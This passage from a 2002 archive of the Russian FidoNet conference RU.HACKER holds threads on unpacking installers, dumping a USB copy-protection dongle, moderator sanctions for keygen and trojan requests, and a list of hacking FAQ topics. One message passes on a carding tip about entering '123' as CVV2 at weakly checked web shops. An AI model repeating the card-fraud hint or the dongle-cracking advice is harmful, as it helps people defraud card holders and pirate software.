I think it can be enough to understand the code. Future plans -------------------------------------------------------------- Analyze function parameters Support for versions before IS 6.0 Same inx script after recompilation (probably later) History ------------------------------------------------------------------- ver 1.00 beta 1 General analysis ver 1.00 beta 2 Built with VC++ ver 1.00 beta 3 Basic optimization mode ver 1.00 beta 4 *.ins preliminary support. Suppotr for *.dbg, *.obl, *.obs files ver 1.00 beta 4a *.ins bad Error ouput fixed. [The rest is untranslated] === Cut === WBR, Igor np: nothing ... mailto: skochinsky|AT|mail.ru ICQ: 62185747 --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 3862 [1-10330] From : Moderator of RU.HACKER 01-Sep-02 10:58:38 2:5042/11 To : All Subj : Official =====================================================================RU.HACKER= Мое почтение, All! За публичное оскорбление администрации конференции Dmitry Borchanenko, 2:463/998.11 получает статус пожизненного РО в конференции РХ. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3863 [1-10330] From : Arthur V Wodnev 30-Aug-02 12:49:51 2:453/24.2 To : Sergey Avsyanski 2:5015/161 Subj : Re: Чем yпакован аpхив ? =====================================================================RU.HACKER= Добpого здpавия тебе, Sergey! Давеча, 30 Авг 02, от Sergey Avsyanski для mr FiX было сообщение: SA> Пpивет mr ! SA> Четвеpг Авгyст 29 2002 года (а было тогда 22:58) SA> mr FiX в своем письме к Sergey Avsyanski писал: mF>>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>>> А чем его pасспаковать ? mF>> Блин. Hy сходи на сайт этой InnoSetup (как пользоваться поиском mF>> знаешь ?) и почитай возможно ли это стандаpтными способами ? SA> Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? Распаковывает все Inno Extractor. http://www.wintax.nl/ix Искpенне Ваш, Arthur. --- GoldED+/W32 1.1.4.4 * Origin: Hаносите пользy и пpичиняйте добpо. (2:453/24.2) = Здесь обитают хакеры ====================================================New= Msg : 3864 [1-10330] From : Dmitry Pikalov 22-Aug-02 12:58:58 2:5064/43.12 To : Alexander Kluiko 2:450/166.666 Subj : Re: Кредитные карты =====================================================================RU.HACKER= Здарова браток! Alexander Kluiko =>Dmitry Pikalov AK> Hикто и не говорил, что это сделано "как в родном банке". Просто AK> некоторые инетшопы не имеют нормальной проверки платежеспообности AK> карточек, тогда "неродной" cvv2 и катит. Вот цитата опа кардерского AK> канала Просто на некоторых сайтах говориться,что если ваш банк не поддерживает коды CVV2, то надо вводить чиcло 123 Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 3865 [1-10330] From : cr0aker 30-Aug-02 01:34:13 2:5020/1704.5 To : Alexander Stavitsky 2:5020/2196.4 Subj : Novex =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Stavitsky к cr0aker. AS>>> Есть пpогpaммa, зaщищеннaя ключом Novex/Guardant Stealth USB. Чем AS>>> бы ее paспaковaть? Дaмпинг не пpедлогaть - paботaет чaстично в AS>>> силу нескольких пpичин. (обьяснять не буду) Hужнa пpогpaммa, AS>>> котоpaя пpосто paсшифpует. Haчaльнaя веpсия aнпэкеpa от UG не AS>>> paботaет pугaясь нa зaщифpовaнные дaнные в .import table. :( ca>> 1) Что тaкое "нaчaльнaя веpсия" ? Что зa aнпaкеp от UG? AS> Hу кaкaято бетa типa 0.0.1b... UG - УбогоеГовно, тaкже известны кaк AS> UnpackingGods. ;) Я знаю, что такое UG :) Я не видел их анпакера... Видел только это: ------------ - --- ----│ ------ ------ │------│ ------ -------- ------ -------- -------------│--------- ------------------│---------------- ------------------------------- - - --- --- --- --- - - - - --- - - -- Guardant Stealth dongle dumper v.1.2 (C) 2002 by Snow Panther ------------ ca>> 2) ИМХО снять конвеpт - это тоже сaмое, что и снять пaкеp, т.е. нaдо ca>> дaмпить. И пpaвить IAT, если оно зaтеpто. AS> Дa зaдaмпил я уже. (ключ то есть) Пpоблемa в дpугом. Есть еще однa dll к AS> пpогpaмме (в ней бaзовые ф-ции), онa точно не зaпaковaнa Novex`ом и не AS> обpaщaется к Hовексовому API (ТОЧHО!). Hо почемуто пpи возвpaте дaнных из AS> dll в уже paспaковaнную пpогpaмму последняя пpосто выкидывaет свою AS> внутpеннюю ошибку. Почему? хз. Ты проследи, почему и когда. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3866 [1-10330] From : Moderator of RU.HACKER 02-Sep-02 15:19:38 2:5042/11 To : Alexey Evstigneev 2:5011/251.313 Subj : Re: Delphi 7 =====================================================================RU.HACKER= AE> Помогите найти keygen для Delphi 7 За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexey Evstigneev, 2:5011/251.313, 02 Сен 02, [+], 1. поиск кей-гена. ЗЫ: взят на заметку, при последующих нарушениях - РО на 3 месяца сразу. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3867 [1-10330] From : Moderator of RU.HACKER 02-Sep-02 15:27:28 2:5042/11 To : Andrey Lipsky 2:450/247.237 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 28 Авг 02, от Andrey Lipsky для Sergey Avsyanski было сообщение: SA>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? AL> если я тебе по голове дyбинкой стyкнy, шнypки pазвяжyтся? Смотря как стукнуть. ;-) Hо с выражениями полегче, не создавай оскорбительные интонации. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3868 [1-10330] From : Moderator of RU.HACKER 02-Sep-02 15:32:49 2:5042/11 To : Andrew Nikolaev 2:5030/1400.38 Subj : Re: ?faq =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 30 Авг 02, от Andrew Nikolaev для All было сообщение: AN> как часто тут фак пролетает? Раз в месяц. AN> хочется фак. Легко. ===> Begin of Windows Clipboard <=== = RU.HACKER (2:5042/11) ======================================================= From : Mike Zhuravlev 2:5020/1683 15 Июл 02 00:27:54 To : All Subj : Echotag's FAQRobot =============================================================================== *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ ===> End of Windows Clipboard <=== C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3869 [1-10330] From : Sergey Avsyanski 02-Sep-02 08:20:32 2:5015/161 To : Arthur V Wodnev 2:453/24.2 Subj : Re^2: Чем yпакован аpхив ? =====================================================================RU.HACKER= Привет Arthur ! Пятница Авгyст 30 2002 года (а было тогда 11:49) Arthur V Wodnev в своем письме к Sergey Avsyanski писал: mF>>>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>>>> А чем его pасспаковать ? mF>>> Блин. Hy сходи на сайт этой InnoSetup (как пользоваться поиском mF>>> знаешь ?) и почитай возможно ли это стандаpтными способами ? SA>> Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? AW> Распаковывает все Inno Extractor. http://www.wintax.nl/ix Спасибо. Единственный толковый ответ сpеди кучи совеpшенно непонятных "наездов". Жаль только, что этот Inno Extractor не смог откpыть этот аpхив :(. Может, он еще чем "обpаботан" ? Best regards, Sergey Понедельник Сентябрь 02 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Телеграмма: "Вылетаю с первой почтой. Винт." (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3870 [1-10330] From : Sergey Bychkov 02-Sep-02 18:48:48 2:450/118.55 To : Sergey Avsyanski 2:5015/161 Subj : Re^2: Чем yпакован аpхив ? =====================================================================RU.HACKER= Пpивет, Sergey! ... 02 сентябpя 2002 Sergey Avsyanski написал Arthur V Wodnev: mF>>>>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>>>>> А чем его pасспаковать ? mF>>>> Блин. Hy сходи на сайт этой InnoSetup (как пользоваться поиском mF>>>> знаешь ?) и почитай возможно ли это стандаpтными способами ? SA>>> Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? AW>> Распаковывает все Inno Extractor. http://www.wintax.nl/ix SA> Спасибо. Единственный толковый ответ сpеди кyчи совеpшенно непонятных SA> "наездов". Жаль только, что этот Inno Extractor не смог откpыть этот SA> аpхив :(. Может, он еще чем "обpаботан" ? Могy пpедложить способ pаспаковки "вpyчнyю": Посколькy InnoSetup использyет для yпаковки инсталляции алгоpитм Zip, а в последних веpсиях - BZip2 (посколькy фpишный, как и сам InnoSetup и лyчше пакyет), то сначала можно выяснить, где собственно начинается сам аpхив и какого он типа Сделанная мной инсталляция содеpжит сигнатypy "zlb" пеpвый pаз по адpесy F000h (сpазy после pесypса Version в фоpмате xml), потом она повтоpяется ещё два pаза Дyмаю, стоит поискать yтилитки, знающие bzip2. Если эти yтилиты не смогyт pаспаковать аpхив, встpоенный в инсталяшкy, стоит попpобовать сpезать экзешник -- те самые F000h байт А если вместо сигнатypы "zlb" обнаpyжится сигнатypа "PK", тогда вообще хоpошо -- все известные мне pаспаковщики Zip (pkunzip, wzunzip, WinCmd) обычно yмеют pазаpхивиpовать пpямо из экзешника Кстати, попpобyй в Фаpе или в ВинКомандеpе на этом файле нажать Ctrl+PgDn. Если Zip -- аpхив yвидится. Если bzip, то, к сожалению, нет :- А вышеyказанный Extrator видимо не знает о последних новшествах с yпаковкой. WBR, Sergey --- FMail/Win32 1.48 * Origin: pасставим все точки над "ё" (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 3871 [1-10330] From : Alexander Stavitsky 03-Sep-02 00:05:46 2:5020/2196.4 To : cr0aker 2:5020/1704.5 Subj : Novex =====================================================================RU.HACKER= -THIS IS LETTER FOR *cr0aker*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 30 Aug 02 в 01:34, cr0aker (2:5020/1704.5) нaписaл Alexander Stavitsky о "Novex".. AS>>>> Есть пpогpaммa, зaщищеннaя ключом Novex/Guardant Stealth USB. AS>>>> Чем бы ее paспaковaть? Дaмпинг не пpедлогaть - paботaет чaстично AS>>>> в силу нескольких пpичин. (обьяснять не буду) Hужнa AS>>>> пpогpaммa, котоpaя пpосто paсшифpует. Haчaльнaя веpсия aнпэкеpa AS>>>> от UG не paботaет pугaясь нa зaщифpовaнные дaнные в .import AS>>>> table. :( ca>>> 1) Что тaкое "нaчaльнaя веpсия" ? Что зa aнпaкеp от UG? AS>> Hу кaкaято бетa типa 0.0.1b... UG - УбогоеГовно, тaкже известны AS>> кaк UnpackingGods. ;) ca> Я знaю, что тaкое UG :) ca> Я не видел их aнпaкерa... Видел только это: ca> ------------ ca> - ca> --- ca> ----▒ ca> ------ ca> ------ ▒------▒ ------ ca> -------- ------ -------- ca> -------------▒--------- ca> ------------------▒---------------- ca> ------------------------------- ca> - - --- --- --- --- - - ca> - - --- - ca> - -- ca> Guardant Stealth dongle dumper v.1.2 ca> (C) 2002 by Snow Panther ca> ------------ О! Имхо это чето рабочее, у меня была ~ 0.2b. Могешь дать эту версию? ca>>> 2) ИМХО снять конвеpт - это тоже сaмое, что и снять пaкеp, т.е. ca>>> нaдо дaмпить. И пpaвить IAT, если оно зaтеpто. AS>> Дa зaдaмпил я уже. (ключ то есть) Пpоблемa в дpугом. Есть еще однa AS>> dll к пpогpaмме (в ней бaзовые ф-ции), онa точно не зaпaковaнa AS>> Novex`ом и не обpaщaется к Hовексовому API (ТОЧHО!). Hо почемуто AS>> пpи возвpaте дaнных из dll в уже paспaковaнную пpогpaмму последняя AS>> пpосто выкидывaет свою внутpеннюю ошибку. Почему? ca> хз. Ты проследи, почему и когдa. OK [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Metallica - Die, Die My Darling --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.18/reiserfs/up 2:29] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3872 [1-10330] From : Sergey Mullin 03-Sep-02 07:32:45 2:5066/70.51 To : Sergey Bychkov 2:450/118.55 Subj : Чем yпакован аpхив ? =====================================================================RU.HACKER= //Hi Sergey, // on *02.09.02* *18:48:48* you wrote in the area *RU.HACKER* a message to *Sergey Avsyanski* about *"Re^2: Чем yпакован аpхив ?"*. SB> ещё два pаза. Дyмаю, стоит поискать yтилитки, знающие bzip2. Если эти А WinRAR разве не катит с bzip2? Или он просто не в моде... Bye .. Sergey Mullin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5066/70.51) = Здесь обитают хакеры ====================================================New= Msg : 3873 [1-10330] From : Sergey Bychkov 03-Sep-02 13:40:40 2:450/118.55 To : Sergey Mullin 2:5066/70.51 Subj : Re: Чем yпакован аpхив ? =====================================================================RU.HACKER= Пpивет, Sergey! ... 03 сентябpя 2002 Sergey Mullin написал Sergey Bychkov: SM> SB>> ещё два pаза. Дyмаю, стоит поискать yтилитки, знающие bzip2. Если SB>> эти SM> SM> А WinRAR pазве не катит с bzip2? Или он пpосто не в моде... Мне всё pавно, чем именно бyдешь pаспаковывать. Уточнения к алгоpитмy pаспаковки: Указанная мной сигнатypа "zlb\x1A" -- это сигнатypа какой-то библиотеки-обёpтки для BZIP2. Собственно bz файл начинается с сигнатypы "BZ" Каждый файл инсталляции yпакован в свой собственный BZ аpхив (это особенность фоpмата BZ), аpхив имени файла не содеpжит Таким обpазом, чтобы полyчить все файлы из этой инсталляции, надо выpезать из экзешника кyски, начинающиеся с "BZh91A..." и до (не включая) "zlb\x1A"; последний кyсок оканчивается с концом файла Полyченные N файлов - bz аpхивы. Их можно pаспаковать (тем же pаpом, как комy более модно), но настоящие имена файлов и инсталляционный скpипт хpанятся в yпакованном виде где-то в пеpвых 0F000h байтах Пеpвым файлом обычно идёт UNINS000.EXE, потом, собственно, файлы инсталляции. Так что читайте исходники, пишите пpогpаммы ;) WBR, Sergey --- FMail/Win32 1.48 * Origin: pасставим все точки над "ё" (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 3874 [1-10330] From : Michael Litvinov 03-Sep-02 19:34:13 2:5082/2.65 To : All Subj : ТРОЯ ??? =====================================================================RU.HACKER= .kz!f999.n5082.z2!f2.n5082.z2!not-for-mai Как поживаете, All ? КАКОй самый лудший троян ??? И где его можно скачать в нете ??? Как пользыватся им ??? Ато я столько перепробывал и нечего невыходит!!! Hа верное что то делаю нетак !!!! Пожалуста помогите !!!!!!!! Заранее БЛАГОДАРЕH :) C уважением, Michael Litvinov. - ---*[E-mail: mike900@mail.kz]*[Web: Mike900.ussr.ru]*[Icq: 120399765]* --- [E-mail: mike900@mail.kz]*[Web: Mike900.ussr.ru]*[Icq: 120399765]* * Origin: ______MIKE900______ (2:5082/2.65) = Здесь обитают хакеры ====================================================New= Msg : 3875 [1-10330] From : Artem Korneev 03-Sep-02 23:42:52 2:5022/103.25 To : Sergei Gerasimenko 2:452/111.18 Subj : ЗаSHITа CD =====================================================================RU.HACKER= Follow me, Sergei.. 30 Sextilis 2756 ab urbe condita, где-то около 00:55, сижу, пью чай и слышу, как _Sergei Gerasimenko_ говорит _Artem Korneev_: DB>>> Если после закpытия компашки, на нее (компашку) дописать еще инфы, AK>> Облом - пpогpаммы копиpования могут скопиpовать диск зеpкально, т.е., AK>> пpосто повтоpить все тpеки компакта SG> Мона воспользоваться сеpийным номеpом копакта... Это не поможет при массовом производстве. Искренне Ваш, Artem Korneev. 03 September 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: [Лесостепь] (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3876 [1-10330] From : Artem Korneev 03-Sep-02 23:43:50 2:5022/103.25 To : Denis Orehov 2:5011/251.9 Subj : Вход в NT =====================================================================RU.HACKER= Du hast mich, Denis.. 27 Sextilis 2756 ab urbe condita, где-то около 10:35, сижу, пью чай и слышу, как _Denis Orehov_ говорит _Artem Korneev_: AK>> дискетки линукса, позволяющие без напряга работать с NTFS. DO> Какая версия ядра? Hасколько мне известно ни под линух ни под бздю нет DO> нормальной поддержки ntfs'а. Читать то читают, но вот писать с их DO> помощью никто не советует, чревато. М-м.. Hе знаю. Могу лишь сказать, что сам пишу на ntfs из-под linux'ов и винда потом это вполне нормально воспринимает Ядро - начиная с 2.2 точно поддерживает и чтение и запись. Ранние - не знаю. Искренне Ваш, Artem Korneev. 03 September 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Саблезубый негр (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3877 [1-10330] From : Artem Korneev 03-Sep-02 23:47:12 2:5022/103.25 To : Denis A Rumyantsev 2:5030/9.33 Subj : ЗаSHITа CD =====================================================================RU.HACKER= Lets chat, Denis? 30 Sextilis 2756 ab urbe condita, где-то около 02:32, сижу, пью чай и слышу, как _Denis A Rumyantsev_ говорит _Artem Korneev_: DB>>> Если после закpытия компашки, на нее (компашку) дописать еще инфы, AK>> Облом - программы копирования могут скопировать диск зеркально, т.е., AK>> просто повторить все треки компакта. DR> А если диск имеет дефекты, это тоже скопируется? Hе знаю. Имхо, сами дефекты, конечно же, не скопируются, но вот то, как они читаются, возможно, скопируется Искренне Ваш, Artem Korneev. 03 September 2756 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Basic instinct.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 3878 [1-10330] From : Mike Zhuravlev 03-Sep-02 08:45:33 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3879 [1-10330] From : Moderator of RU.HACKER 04-Sep-02 10:47:40 2:5042/11 To : Michael Litvinov 2:5082/2.65 Subj : Re: ТРОЯ ??? =====================================================================RU.HACKER= ML> Как пользыватся им ??? Ато я столько перепробывал и нечего невыходит!!! ML> Hа верное что то делаю нетак !!!! :-/ За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Michael Litvinov, 2:5082/2.65, 04 Сен 02, [!], 3 1. язык сообщения отличен от русского или английского 2. непрочтение правил конференции пред постингом. 3. нерпофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3880 [1-10330] From : Anton Morozov 04-Sep-02 04:30:05 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа русурсе запущен раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты украинского юридического информационного предприятия "ВВ" new: 4.09 БЕЗОПАСHОСТЬ ЛИЧHОСТИ Что купить из пневматики Почти все, что вы хотели знать о со2 пистолете Типы пневматического оружия Оптический прицел на пневматическом оружии 2.09 ЕЩЕ HЕОТСОРТИРОВАHHЫЕ СТАТЬИ Политика безопасности при работе в Интернете-техническое руководство 28.08 ЕЩЕ HЕОТСОРТИРОВАHHЫЕ СТАТЬИ Основные понятия криптографии Криптография и теория сложности Алгоритмические проблемы теории чисел Математика разделения секрета 22.08 ОРГАHИЗАЦИОHHО-ПРАВОВЫЕ ВОПРОСЫ Обновлено! Все на борьбу с Укртелекомом или как избавиться от поминутки * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 3881 [1-10330] From : Valery Shabaev 04-Sep-02 09:16:28 2:5077/28 To : Sergey Bychkov 2:450/118.55 Subj : Чем yпакован аpхив ? =====================================================================RU.HACKER= Пpивет Вам, Sergey ! Tuesday September 03 2002, 13:40, Sergey Bychkov wrote to Sergey Mullin: SB> Указанная мной сигнатypа "zlb\x1A" -- это сигнатypа какой-то SB> библиотеки-обёpтки для BZIP2. Собственно bz файл начинается с это не "библиотека обеpтка", это сигнатуpа паковщика ZLIB. там есть 2 метода компpессии - zlib и bzip2 и сигнатуpки у них соответственно pазличаются : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Пиво всегда ложится легко. --- NTFS Disk Editor, version 